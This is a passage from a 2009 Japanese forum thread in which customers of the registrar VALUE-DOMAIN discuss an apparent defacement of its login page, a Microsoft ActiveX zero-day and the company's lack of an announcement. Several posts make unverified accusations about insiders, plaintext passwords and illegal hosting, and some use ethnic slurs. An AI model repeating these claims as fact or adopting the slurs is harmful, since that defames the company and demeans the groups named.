144:名無しさん@お腹いっぱい。
09/07/07 03:29:44 0
次はどんなハード調教をしてくれるんだろうと更なる期待が高まる

145:名無しさん@お腹いっぱい。
09/07/07 03:47:48 0
次から次に、ここは何かとネタが尽きんなぁ・・・

146:名無しさん@お腹いっぱい。
09/07/07 04:04:57 0
今回の件すらアナウンスしないのなら引っ越しするかな

147:名無しさん@お腹いっぱい。
09/07/07 04:13:48 0
俺は特定のドメイン以外は2月の障害の時点で全部移管したよ。

148:名無しさん@お腹いっぱい。
09/07/07 04:31:14 0
どこに移管したんだよ

149:名無しさん@お腹いっぱい。
09/07/07 04:35:58 0
>>148
毎度w

150:名無しさん@お腹いっぱい。
09/07/07 06:10:39 0
>▼2009.07.02
>セキュリティ強化について

率先して強化しなければならないセキュリティーを間違えてるだろw

151:名無しさん@お腹いっぱい。
09/07/07 06:16:46 0
>>31-32 の件ですが、msvidctl.dllの脆弱性です。
アドバイザリ出ました。
URLリンク(www.microsoft.com)
レジストリにkill bitを立てるか、以下の「Fix it」を押しましょう。
URLリンク(support.microsoft.com)

他にpdfとswfも併用されていますが、こちらは既知の脆弱性なので
AdobeReaderやFlashPlayerが最新バージョンであれば問題ありません。

152:名無しさん@お腹いっぱい。
09/07/07 07:48:48 0
現時点でもまだVDログインページは修正されてないの?

153:名無しさん@お腹いっぱい。
09/07/07 08:24:17 P
>>151
乙加齢臭

154:121
09/07/07 08:25:23 0
おはよう
朝起きたらサポートからの回答か3件も入っていてビビッた。いつものように放置だと思っていたのに。
コピペは控えるけど要約すると

・カスタマーサポート(受付部門)には「弊社担当部門(メンテ担当?)」からの報告が無い
・担当部門への申し送りは行う
・真偽確認&アナウンスは担当部門の対応となる

ってところかな。一応、事の重大さは認識しているようだ。

気になるのは「担当部門からの報告がない」ってところ。
つまり、昨日深夜にスクリプトが外れたのは、VDの操作ではなく、
仕掛けた本人による操作の可能性もあるということだ。

正式アナウンスがあるまで、ログインは控えた方が良いな。

155:名無しさん@お腹いっぱい。
09/07/07 08:28:02 0
しかし、速報でも何でも、公式アナウンスは絶対しないんだw
ある意味潔いよねw デジロイズムw

156:名無しさん@お腹いっぱい。
09/07/07 08:41:44 0
いつも事あれば全て「担当部門(外注)」だな・・・

157:名無しさん@お腹いっぱい。
09/07/07 08:51:22 0
去年の広告鯖ウイルス混入の件の再来って感じだね

158:名無しさん@お腹いっぱい。
09/07/07 09:18:14 P
誰か高木先生にチクってよ

159:名無しさん@お腹いっぱい。
09/07/07 09:29:38 0
今wiki見たら前のウイルス事件の内容はいつの間にか記事削除されてるw
社員さんもそういう熱意を肝心なとこに向けてくれたらいいのにw

160:名無しさん@お腹いっぱい。
09/07/07 09:36:53 0
>>154
認識はいつも早いんだけど、その後放置でアナウンスせず黙殺だからいつもと変わらないのでは?
クレームにそういった内容の定型文を即返すって対応は従来通りだし

しかし、これくらいの修正すら即できない人間しか社内にいないのか?
外部丸投げがデフォでもちょっとひどすぎだろ

161:名無しさん@お腹いっぱい。
09/07/07 09:49:34 0
>>154
今回もやっぱり文末は
「騒がず黙って○週間待ってろカス共 ○週間の間は再度文句垂れてきてもシカトだからなコラ(意訳)」
な訳?

162:名無しさん@お腹いっぱい。
09/07/07 09:51:14 0
:::::::::::::::(>'A`)> ウワァァァァ :::::::
:::::::::::::::( へへ :::::::::::::::::::::::::::::::::

163:名無しさん@お腹いっぱい。
09/07/07 09:58:58 0
今更ながら・・・







これはひどい

164:121
09/07/07 10:07:51 0
>>160
そーかもしれないけど、客としては待つしかないしなあ。
でも、俺も過去何度かサポートとやりとりしてるけど、深夜に送った奴に
深夜のウチに打ち返してきたのは初めてだったよ。

>>161
いや、見慣れたその定型文は今回は無いよ。

今回の件は顧客の財産(金やドメイン)に直接影響する問題なので
迅速かつ的確な対応をお願いしたいですな、VD様。

165:名無しさん@お腹いっぱい。
09/07/07 10:11:20 0
たしかにドメイン絡みで各種情報ぶっこ抜かれて改竄でも
やられたら洒落にならん。
ここで管理してるあと数個のドメインも、あと少しで移管可
になるんで全部移管したいが怖くてログインできん。

166:名無しさん@お腹いっぱい。
09/07/07 10:15:40 0
今はログインしても大丈夫? まだ駄目?

167:名無しさん@お腹いっぱい。
09/07/07 10:18:30 0
今回、ログイン部分が改ざんされ個人情報が脅かされたわけだろ?

5000件以上の個人情報をデータベース等として所持し事業に用いている事業者は
必然的に個人情報取扱事業者に該当するんだよ。
該当する場合は個人情報保護法に乗っ取った運営をしなければならない。
今回、こういう被害受けたからには、デジロック側が個人情報保護法に基づき総務省に報告義務がある。
まさか登録者5000件未満というわけでも無さそうだし。

それ以外にも、以前にも似たようなことがあったということから、
電気通信事業者としても注意義務違反にあたるかもしれない。
ここらへんは詳細わからないことには判断できないが。

とにかく、このまま放置で済む問題ではないのは確実だ。

168:名無しさん@お腹いっぱい。
09/07/07 10:22:10 0
何が入ってるかわからんからログインするな。

169:名無しさん@お腹いっぱい。
09/07/07 10:32:17 0
>>154
やっぱり、「担当部門」=「前回広告鯖をクラックしたシナ人」=「今回ログインフォームを改ざんした犯人」なんじゃね?
だから、デジロの中の人が真偽確認してもレスポンスが悪い、と

もう、大阪人は信用ならんなぁ

170:名無しさん@お腹いっぱい。
09/07/07 10:34:23 0
大阪は大阪民国法が適用されるから日本国の法律には準拠しないよ

171:名無しさん@お腹いっぱい。
09/07/07 10:37:02 0
なんかサポ板の挙動がおかしいのもこの改竄の件関係あるのかな?
それとも6月頭から完全放置のネームサーバ障害のせいかな?

172:名無しさん@お腹いっぱい。
09/07/07 11:25:47 0
これだけ被害だしといて、告知すらないとかありえないわ。
ウイルス配布元として訴えられてもしょうがないレベル

173:名無しさん@お腹いっぱい。
09/07/07 11:40:54 0
別にデジロック擁護する気はないけど、被害って言ってもまだ別に表立った実害って報告されてないでしょ?
徹底的に祭り上げられるか否かは今後の動向次第じゃないかな現時点では

速報なり何なりで即時何かしらの公式アナウンス出すべきだとは思うけどね
後に大事になった時に、認知しながらも被害拡大させた責任追及されて一番困るのはデジロックだろうから

174:名無しさん@お腹いっぱい。
09/07/07 11:49:39 0
て言うかまだ今の時点でログインページは改ざんされてるの?
どっちにしてもデジロが何もユーザーに対して説明しないと怖くてコンパネ入れないけど・・・

175:名無しさん@お腹いっぱい。
09/07/07 11:52:48 0
ここはいつも通り、自然治癒力に頼るしか方法はありません

176:名無しさん@お腹いっぱい。
09/07/07 12:07:15 0
どうせまた内部犯行だろ

177:名無しさん@お腹いっぱい。
09/07/07 12:12:50 0
技術者が逃げて外注に頼ってもお金が無くて素性の確かでない安いところに
頼んで乗っ取られたとかじゃない?

178:名無しさん@お腹いっぱい。
09/07/07 12:25:29 0
結局どうだったの?改竄はあったの?

179:名無しさん@お腹いっぱい。
09/07/07 12:30:18 0
GENOみたいな商売ならだんまりでも
「まあGENOだしな」で済むだろうけど
ここは腐っても鯖屋だぜ?
なるべく早急にまともな対応をしないと
冗談抜きに取り返しのつかないことになるかと

180:名無しさん@お腹いっぱい。
09/07/07 12:32:09 0
改ざんがあったかどうかなんて、ログくらいよめよ
90レス番台あたりとかに、全部のってるじゃん

181:名無しさん@お腹いっぱい。
09/07/07 12:41:01 0
デジロなんて、コアサーバーの殆どが児童ポルノサイト運営させて沢山あるくらいだしな
全く何とも思ってないよ

182:名無しさん@お腹いっぱい。
09/07/07 12:43:35 0
もしなんらかの損害が発生しても、
「あらゆる非常事態が発生したことによる損失」に対する責任は負いません
そういう規約ですから

183:名無しさん@お腹いっぱい。
09/07/07 12:45:09 0
login.php を元に戻したのが誰かが分からない限り、ログインするのは危険。

デジロが対応したのなら、そのことを告知すべき、
公式告知がない=仕掛けた奴が操作している可能性あり。すると、ログインは危険

184:名無しさん@お腹いっぱい。
09/07/07 12:48:42 0
待て…
よく考えるんだ…

これはトラブル続きで移管転出続出のデジロが仕組んだ逆転捨て身の移管防止策…!?

185:名無しさん@お腹いっぱい。
09/07/07 12:51:55 0
捨て身過ぎるだろw

186:名無しさん@お腹いっぱい。
09/07/07 12:57:28 0
ああそうか、鯖に安全宣言がなされてなければ、
じつはPOSTの受け取りを細工されてて、生パスが抜かれるかもしれんわけね

187:名無しさん@お腹いっぱい。
09/07/07 13:07:53 0
URLリンク(www.itmedia.co.jp)

Windowsにゼロデイの脆弱性、サイト改ざん攻撃が多発

MicrosoftのVideo ActiveX Controlにゼロデイの脆弱性が発覚した。何千ものWebサイトが改ざんされ、閲覧しただけでマルウェアに感染する状態になっているという。

 MicrosoftのWindowsに影響する新たな脆弱性が見つかり、これを悪用したゼロデイ攻撃が発生している。Microsoftは7月6日、アドバイザリーを公開して注意を呼び掛けた。

 Microsoftによると、脆弱性はVideo ActiveX Controlに存在し、Windows XPとWindows Server 2003が影響を受ける。Internet Explorer(IE)を使って悪用された場合、ユーザーが何もしなくてもリモートからコードを実行される恐れがある。

 SANS Internet Storm Centerによれば、この脆弱性を悪用するコードが中国の多数のWebサイトで公開され、それを使った攻撃が多発。何千ものWebサイトが改ざんされ、閲覧しただけでマルウェアに感染する状態になっているという。

 Microsoftは現在、脆弱性を解決するためのセキュリティアップデートを開発中。当面の回避策として、脆弱性のあるActiveX Control(msvidctl.dll)にキルビットを設定する方法を紹介している。自動的にこの回避策を適用できるツールも用意した。

 また、米McAfee、Symantecなど主要セキュリティ企業はウイルス対策ソフトの定義ファイルを更新し、今回の脆弱性の悪用コードを検出できるようにしたと発表している。

188:名無しさん@お腹いっぱい。
09/07/07 13:09:17 0
さすがに基幹までのっとられるようになったら終わりだな

189:名無しさん@お腹いっぱい。
09/07/07 13:17:42 0
ここの外注も中華系だよね?
ったく・・・ 前のウイルスの件で懲りなかったのかよ・・・

190:名無しさん@お腹いっぱい。
09/07/07 13:18:44 0
よく分からんけど
感染対象はIEで、vistaでは対象外って事でおk?

191:名無しさん@お腹いっぱい。
09/07/07 13:22:48 0
ここの、
その後の正規サイト改ざん〔後篇〕(3):新たな攻撃手法〜「新Nine Ball」「8080」
URLリンク(www.so-net.ne.jp)

ここ読んどけ。
●「8080」:大量ドメインを使用する8080攻撃


192:名無しさん@お腹いっぱい。
09/07/07 13:38:55 0
2009.07.02
セキュリティ強化について

wwwwwwwwwwwwwwwwwwwwwwwwwwwww

193:名無しさん@お腹いっぱい。
09/07/07 13:49:06 0
配下サイトが全滅、恐怖の共有サーバー丸ごと改ざん〜「5+1」件の事例報告
URLリンク(www.so-net.ne.jp)


いやー、こわいねー

194:名無しさん@お腹いっぱい。
09/07/07 14:00:34 0
まさに今回のはデジロ狙い撃ちでしょ?

この業界で商売してて狙われてあっさり撃たれるデジロ…orz

195:名無しさん@お腹いっぱい。
09/07/07 14:11:52 0
非常にお伝えしにくいのですが、実はVALUE-DOMAINのログインパスワードは、
ハッシュ化されていない、プレインテキスト記録なので、login.phpの書き変えが可能なら、
DBパスも取られているはずなので、もう既に全ユーザーのパスワードが割れて
いることになるのです。

196:名無しさん@お腹いっぱい。
09/07/07 14:22:10 0
だとしたらlogin.phpを改竄する意味は?

197:名無しさん@お腹いっぱい。
09/07/07 14:22:55 0
デジロ、login.php の書き換え事件についての公式声明を早く出せ。
これでも、だんまり戦術が通用すると思っているのか?

198:名無しさん@お腹いっぱい。
09/07/07 14:28:38 0
いつも通り放置してるだけですけどね

199:名無しさん@お腹いっぱい。
09/07/07 14:31:27 0
鉄壁なマイペースw

200:名無しさん@お腹いっぱい。
09/07/07 14:35:21 0
久々に来てみたら大変な事になっているじゃないか
今度のは今まででも最強だな・・・
オワタ

201:名無しさん@お腹いっぱい。
09/07/07 14:44:05 0
>>194
無差別攻撃で落ちたもののひとつなだけじゃないかと
まだ発覚してないところがありそう


次ページ
最新レス表示
スレッドの検索
類似スレ一覧
話題のニュース
おまかせリスト
▼オプションを表示
暇つぶし2ch

5388日前に更新/155 KB
担当:undef